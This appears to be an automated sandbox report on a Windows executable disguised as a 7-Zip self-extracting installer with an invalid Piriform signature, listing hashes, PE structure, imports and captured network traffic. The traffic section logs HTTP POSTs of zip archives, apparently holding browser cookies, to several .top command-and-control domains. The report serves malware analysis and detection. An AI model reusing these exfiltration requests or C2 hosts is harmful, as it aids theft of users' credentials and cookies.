SHA512:	a10ad791de2d77fcf608ff48fcea8e4993c69463132c54b38326f0465236891aeffedb00c61a999ae96f2869a37a77af8d2153a6863b104f2b9d5f3f961ed535
SSDEEP:	24576:A1qUuHGmg09lDNfEWp3iszF7UPVfVogWJGjHwzhP5vOfZPqSfdRfwIMHLtK21qOw:A1qUuN9VNhzu9fVok7wNIpgVtKOqV3mY
File Content Preview:	MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...(D.W.....................X....................@..................................................................................0..............&Z..h:.

File Icon


Icon Hash:	ecb2b0313392d2f8

Static PE Info

General
Entrypoint:	0x4193af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x57004428 [Sat Apr 2 22:14:00 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	a1a66d588dcf1394354ebf6ec400c223

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	10/13/2019 5:00:00 PM 10/18/2022 5:00:00 AM
Subject Chain	CN=Piriform Software Ltd, OU=RE 901, O=Piriform Software Ltd, L=London, C=GB
Version:	3
Thumbprint MD5:	4294D683DDCCB31DB2E3DB0AD8A343FE
Thumbprint SHA-1:	0CB6BDE041B58DBD4EC64BD5A3BE38C50F17BB3D
Thumbprint SHA-256:	9784EFA9505D3C762D0529B0BACF1CF14B7C134289E7F132E5059551C5B7B0D4
Serial:	02FA994D660DE659EE9037ECB437D766

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0041C878h
push 00419540h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0041A1ECh]
pop ecx
or dword ptr [00422B88h], FFFFFFFFh
or dword ptr [00422B8Ch], FFFFFFFFh
call dword ptr [0041A1F0h]
mov ecx, dword ptr [00420B6Ch]
mov dword ptr [eax], ecx
call dword ptr [0041A1F4h]
mov ecx, dword ptr [00420B68h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0041A1F8h]
mov eax, dword ptr [eax]
mov dword ptr [00422B84h], eax
call 00007F5180994F22h
cmp dword ptr [0041E6E0h], ebx
jne 00007F5180994E0Eh
push 00419538h
call dword ptr [0041A1FCh]
pop ecx
call 00007F5180994EF4h
push 0041E074h
push 0041E070h
call 00007F5180994EDFh
mov eax, dword ptr [00420B64h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00420B60h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041A204h]
push 0041E06Ch
push 0041E000h
call 00007F5180994EACh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cca4	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0xca95	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x1b5a26	0x3a68
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a000	0x390	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x18d6a	0x18e00	False	0.599972518844	data	6.69082461804	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1a000	0x3fa0	0x4000	False	0.460510253906	data	5.77210279351	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x4b90	0x800	False	0.41162109375	data	3.63636011565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x23000	0xca95	0xcc00	False	0.251723345588	data	4.6278848373	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x23280	0x19ba	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x24c3c	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON	0x28e64	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON	0x2b40c	0x1a68	data
RT_ICON	0x2ce74	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON	0x2df1c	0x988	data
RT_ICON	0x2e8a4	0x6b8	data
RT_ICON	0x2ef5c	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2f3c4	0x76	data
RT_VERSION	0x2f43c	0x350	data
RT_MANIFEST	0x2f78c	0x309	ASCII text

Imports

DLL	Import
COMCTL32.dll
SHELL32.dll	ShellExecuteExW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHGetSpecialFolderPathW
GDI32.dll	CreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
ADVAPI32.dll	FreeSid, AllocateAndInitializeSid, CheckTokenMembership
USER32.dll	GetParent, ScreenToClient, CreateWindowExW, GetDesktopWindow, GetWindowTextLengthW, SetWindowPos, SetTimer, GetMessageW, CopyImage, KillTimer, CharUpperW, SendMessageW, ShowWindow, BringWindowToTop, wsprintfW, MessageBoxW, EndDialog, ReleaseDC, GetWindowDC, GetMenu, GetWindowLongW, GetClassNameA, wsprintfA, DispatchMessageW, SetWindowTextW, GetSysColor, DestroyWindow, MessageBoxA, GetKeyState, IsWindow, GetDlgItem, GetClientRect, GetSystemMetrics, SetWindowLongW, UnhookWindowsHookEx, SetFocus, SystemParametersInfoW, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetWindowTextW, GetWindowRect
ole32.dll	CreateStreamOnHGlobal, CoCreateInstance, CoInitialize
OLEAUT32.dll	SysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
KERNEL32.dll	SetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetEnvironmentVariableW, GetDriveTypeW, CreateFileW, LoadLibraryA, SetThreadLocale, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, GetTempPathW, GetCurrentDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetModuleHandleW, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetStdHandle, WriteFile, lstrlenA, CreateDirectoryW, GetFileAttributesW, SetCurrentDirectoryW, GetLocalTime, SystemTimeToFileTime, CreateThread, GetExitCodeThread, Sleep, SetFileAttributesW, GetDiskFreeSpaceExW, SetLastError, GetTickCount, lstrlenW, ExitProcess, lstrcatW, GetProcAddress, CloseHandle, WaitForSingleObject, GetExitCodeProcess, GetQueuedCompletionStatus, ResumeThread, SetInformationJobObject, CreateIoCompletionPort, AssignProcessToJobObject, CreateJobObjectW, GetLastError, CreateProcessW, GetStartupInfoW, GetCommandLineW, GetStartupInfoA
MSVCRT.dll	_purecall, ??2@YAPAXI@Z, _wtol, memset, memmove, memcpy, _wcsnicmp, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, realloc, free, wcsstr, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, strncmp, wcsncmp, wcsncpy, strncpy, ??3@YAXPAX@Z

Version Infos

Description	Data
LegalCopyright	Copyright 2005-2016 Oleg N. Scherbakov
InternalName	7ZSfxMod
FileVersion	1.7.0.3900
CompanyName	Oleg N. Scherbakov
PrivateBuild	April 1, 2016
ProductName	7-Zip SFX
ProductVersion	1.7.0.3900
FileDescription	7z Setup SFX (x86)
OriginalFilename	7ZSfxMod_x86.exe
Translation	0x0000 0x04b0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 6, 2021 13:59:48.052381992 CEST	49738	80	192.168.2.3	34.118.72.185
Apr 6, 2021 13:59:48.109541893 CEST	80	49738	34.118.72.185	192.168.2.3
Apr 6, 2021 13:59:48.109785080 CEST	49738	80	192.168.2.3	34.118.72.185
Apr 6, 2021 13:59:48.122473955 CEST	49738	80	192.168.2.3	34.118.72.185
Apr 6, 2021 13:59:48.122632980 CEST	49738	80	192.168.2.3	34.118.72.185
Apr 6, 2021 13:59:48.178822041 CEST	80	49738	34.118.72.185	192.168.2.3
Apr 6, 2021 13:59:48.178850889 CEST	80	49738	34.118.72.185	192.168.2.3
Apr 6, 2021 13:59:48.178981066 CEST	49738	80	192.168.2.3	34.118.72.185
Apr 6, 2021 13:59:48.179044962 CEST	49738	80	192.168.2.3	34.118.72.185
Apr 6, 2021 13:59:48.235249996 CEST	80	49738	34.118.72.185	192.168.2.3
Apr 6, 2021 13:59:49.085952044 CEST	49739	80	192.168.2.3	8.209.67.151
Apr 6, 2021 13:59:49.124306917 CEST	80	49739	8.209.67.151	192.168.2.3
Apr 6, 2021 13:59:49.124389887 CEST	49739	80	192.168.2.3	8.209.67.151
Apr 6, 2021 13:59:49.124947071 CEST	49739	80	192.168.2.3	8.209.67.151
Apr 6, 2021 13:59:49.125073910 CEST	49739	80	192.168.2.3	8.209.67.151
Apr 6, 2021 13:59:49.163351059 CEST	80	49739	8.209.67.151	192.168.2.3
Apr 6, 2021 13:59:49.163366079 CEST	80	49739	8.209.67.151	192.168.2.3
Apr 6, 2021 13:59:49.163373947 CEST	80	49739	8.209.67.151	192.168.2.3
Apr 6, 2021 13:59:49.163408995 CEST	80	49739	8.209.67.151	192.168.2.3
Apr 6, 2021 13:59:49.163418055 CEST	49739	80	192.168.2.3	8.209.67.151
Apr 6, 2021 13:59:49.163453102 CEST	49739	80	192.168.2.3	8.209.67.151
Apr 6, 2021 13:59:49.201756954 CEST	80	49739	8.209.67.151	192.168.2.3
Apr 6, 2021 13:59:50.127573967 CEST	49740	80	192.168.2.3	34.65.214.4
Apr 6, 2021 13:59:50.170528889 CEST	80	49740	34.65.214.4	192.168.2.3
Apr 6, 2021 13:59:50.170623064 CEST	49740	80	192.168.2.3	34.65.214.4
Apr 6, 2021 13:59:50.171329975 CEST	49740	80	192.168.2.3	34.65.214.4
Apr 6, 2021 13:59:50.214310884 CEST	80	49740	34.65.214.4	192.168.2.3
Apr 6, 2021 13:59:50.214432955 CEST	49740	80	192.168.2.3	34.65.214.4
Apr 6, 2021 13:59:50.215960979 CEST	49740	80	192.168.2.3	34.65.214.4
Apr 6, 2021 13:59:50.258778095 CEST	80	49740	34.65.214.4	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 6, 2021 13:57:29.305677891 CEST	51281	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:29.354578972 CEST	53	51281	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:29.830837965 CEST	49199	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:29.905745983 CEST	53	49199	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:30.332413912 CEST	50620	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:30.378329039 CEST	53	50620	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:31.618593931 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:31.670433044 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:33.112518072 CEST	60152	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:33.158584118 CEST	53	60152	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:40.144659996 CEST	57544	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:40.190613985 CEST	53	57544	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:41.257107019 CEST	55984	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:41.306101084 CEST	53	55984	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:42.497829914 CEST	64185	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:42.544014931 CEST	53	64185	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:43.431611061 CEST	65110	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:43.477556944 CEST	53	65110	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:44.191118002 CEST	58361	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:44.251971960 CEST	53	58361	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:44.884506941 CEST	63492	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:44.938745975 CEST	53	63492	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:45.000149965 CEST	60831	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:45.049062967 CEST	53	60831	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:45.826872110 CEST	60100	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:45.872769117 CEST	53	60100	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:46.696856976 CEST	53195	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:46.745830059 CEST	53	53195	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:47.816284895 CEST	50141	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:47.865196943 CEST	53	50141	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:48.643923998 CEST	53023	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:48.692809105 CEST	53	53023	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:49.588318110 CEST	49563	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:49.634416103 CEST	53	49563	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:54.474117994 CEST	51352	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:54.524560928 CEST	53	51352	8.8.8.8	192.168.2.3
Apr 6, 2021 13:57:55.582792044 CEST	59349	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:57:55.629580975 CEST	53	59349	8.8.8.8	192.168.2.3
Apr 6, 2021 13:58:05.595458031 CEST	57084	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:58:05.641505957 CEST	53	57084	8.8.8.8	192.168.2.3
Apr 6, 2021 13:58:12.015284061 CEST	58823	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:58:12.078871012 CEST	53	58823	8.8.8.8	192.168.2.3
Apr 6, 2021 13:58:43.540710926 CEST	57568	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:58:43.599046946 CEST	53	57568	8.8.8.8	192.168.2.3
Apr 6, 2021 13:58:44.550410986 CEST	50540	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:58:44.596360922 CEST	53	50540	8.8.8.8	192.168.2.3
Apr 6, 2021 13:58:50.807975054 CEST	54366	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:58:50.867079020 CEST	53	54366	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:08.334328890 CEST	53034	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:08.397341967 CEST	53	53034	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:21.304825068 CEST	57762	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:21.351838112 CEST	53	57762	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:26.192596912 CEST	55435	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:26.248632908 CEST	53	55435	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:47.582014084 CEST	50713	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:48.027153015 CEST	53	50713	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:48.634402037 CEST	56132	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:49.083774090 CEST	53	56132	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:49.894608974 CEST	58987	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:50.124701023 CEST	53	58987	8.8.8.8	192.168.2.3
Apr 6, 2021 13:59:58.160182953 CEST	56579	53	192.168.2.3	8.8.8.8
Apr 6, 2021 13:59:58.206130981 CEST	53	56579	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:00.355909109 CEST	60633	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:00.418431044 CEST	53	60633	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:25.097374916 CEST	61292	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:25.247983932 CEST	53	61292	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:25.687016964 CEST	63619	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:25.791836977 CEST	53	63619	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:26.181653976 CEST	64938	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:26.316313028 CEST	53	64938	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:26.755951881 CEST	61946	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:26.810094118 CEST	53	61946	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:27.334738970 CEST	64910	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:27.380703926 CEST	53	64910	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:27.807383060 CEST	52123	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:27.863684893 CEST	53	52123	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:28.237390995 CEST	56130	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:28.296190023 CEST	53	56130	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:28.833266973 CEST	56338	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:28.915220976 CEST	53	56338	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:29.539438009 CEST	59420	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:29.606048107 CEST	53	59420	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:29.959130049 CEST	58784	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:30.008408070 CEST	53	58784	8.8.8.8	192.168.2.3
Apr 6, 2021 14:00:39.783418894 CEST	63978	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:00:39.860738993 CEST	53	63978	8.8.8.8	192.168.2.3
Apr 6, 2021 14:02:24.319212914 CEST	62938	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:02:24.377101898 CEST	53	62938	8.8.8.8	192.168.2.3
Apr 6, 2021 14:02:24.794806957 CEST	55708	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:02:24.857368946 CEST	53	55708	8.8.8.8	192.168.2.3
Apr 6, 2021 14:02:25.619178057 CEST	56803	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:02:25.689075947 CEST	53	56803	8.8.8.8	192.168.2.3
Apr 6, 2021 14:02:26.188544035 CEST	57145	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:02:26.258626938 CEST	53	57145	8.8.8.8	192.168.2.3
Apr 6, 2021 14:02:26.504722118 CEST	55359	53	192.168.2.3	8.8.8.8
Apr 6, 2021 14:02:26.567882061 CEST	53	55359	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 6, 2021 13:57:44.884506941 CEST	192.168.2.3	8.8.8.8	0x47de	Standard query (0)	cTUOwSlyoPnUr.cTUOwSlyoPnUr	A (IP address)	IN (0x0001)
Apr 6, 2021 13:59:47.582014084 CEST	192.168.2.3	8.8.8.8	0xc3	Standard query (0)	dyhkw15.top	A (IP address)	IN (0x0001)
Apr 6, 2021 13:59:48.634402037 CEST	192.168.2.3	8.8.8.8	0x47c3	Standard query (0)	mardxd01.top	A (IP address)	IN (0x0001)
Apr 6, 2021 13:59:49.894608974 CEST	192.168.2.3	8.8.8.8	0x9db3	Standard query (0)	esmxc01.top	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 6, 2021 13:57:44.938745975 CEST	8.8.8.8	192.168.2.3	0x47de	Name error (3)	cTUOwSlyoPnUr.cTUOwSlyoPnUr	none	none	A (IP address)	IN (0x0001)
Apr 6, 2021 13:58:43.599046946 CEST	8.8.8.8	192.168.2.3	0xcd3c	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 6, 2021 13:59:48.027153015 CEST	8.8.8.8	192.168.2.3	0xc3	No error (0)	dyhkw15.top		34.118.72.185	A (IP address)	IN (0x0001)
Apr 6, 2021 13:59:49.083774090 CEST	8.8.8.8	192.168.2.3	0x47c3	No error (0)	mardxd01.top		8.209.67.151	A (IP address)	IN (0x0001)
Apr 6, 2021 13:59:50.124701023 CEST	8.8.8.8	192.168.2.3	0x9db3	No error (0)	esmxc01.top		34.65.214.4	A (IP address)	IN (0x0001)
Apr 6, 2021 14:02:24.377101898 CEST	8.8.8.8	192.168.2.3	0x6f92	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

dyhkw15.top

mardxd01.top

esmxc01.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49738	34.118.72.185	80	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Timestamp	kBytes transferred	Direction	Data
Apr 6, 2021 13:59:48.122473955 CEST	5543	OUT	POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------pFIkyNwAeVaGNdK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: dyhkw15.top Content-Length: 67652 Cache-Control: no-cache
Apr 6, 2021 13:59:48.122632980 CEST	5555	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 46 49 6b 79 4e 77 41 65 56 61 47 4e 64 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: -----------------------------pFIkyNwAeVaGNdKContent-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Local\Temp\sldDCZXdq\EoHYfMVIhubMt.zip"Content-Type: application/octet-streamPK@R_AllCo
Apr 6, 2021 13:59:48.178850889 CEST	5555	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
Apr 6, 2021 13:59:48.178981066 CEST	5557	OUT	Data Raw: c3 54 ff f1 ee 6c 36 58 d1 58 62 e5 97 2d 5a 65 68 e8 45 2c d7 a3 31 b2 a0 47 1b bd 0f 41 a9 fc 99 a6 00 46 f8 62 6a 04 7d 45 57 1c e7 a0 69 82 06 2c 76 0c ea 63 d5 a5 53 4b 80 c7 08 df 47 b2 cb 4b 45 c3 8b 01 46 06 98 4c 06 82 7f e0 47 3a 06 e1 Data Ascii: Tl6XXb-ZehE,1GAFbj}EWi,vcSKGKEFLG:>?<[<W\\JC"Obg1z"<)IqE;UI5KV-[NIH4@+8XbEEqlL=`'6/_e9PvN0j(~/sEup

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49739	8.209.67.151	80	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Timestamp	kBytes transferred	Direction	Data
Apr 6, 2021 13:59:49.124947071 CEST	5557	OUT	POST /index.php HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------RIFYxJPFCSleLAB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Host: mardxd01.top Content-Length: 67631 Cache-Control: no-cache
Apr 6, 2021 13:59:49.125073910 CEST	5569	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 49 46 59 78 4a 50 46 43 53 6c 65 4c 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 Data Ascii: -----------------------------RIFYxJPFCSleLABContent-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Local\Temp\sldDCZXdq\VXlKMMGjUnv.zip"Content-Type: application/octet-streamPK@Rcookies/
Apr 6, 2021 13:59:49.163366079 CEST	5570	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>
Apr 6, 2021 13:59:49.163418055 CEST	5571	OUT	Data Raw: f9 a6 8f 36 89 8e b1 f8 d6 66 e3 42 51 1c 68 39 ff e4 86 6f f4 30 72 6d 55 86 ac 9d 75 fa ec d3 be 09 21 12 51 ad aa 4d 61 50 2a 37 0f ca c3 37 b1 a0 65 7c 7f d7 5c 78 d3 b3 03 0f 59 9a 14 ee 4e 2d bb 66 99 b3 9f 6e 39 fd fb 79 30 fa b1 4b 15 a0 Data Ascii: 6fBQh9o0rmUu!QMaP77e\|\xYN-fn9y0K%_im\|tx'b\|1E3=!H1LW6Ri/G7\&w.qx-?2siT\|g-QyNpAP_w;7XYYTQnD!

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49740	34.65.214.4	80	C:\Users\user\AppData\Roaming\uAVhoZXwkG\Male.exe.com

Timestamp	kBytes transferred	Direction	Data
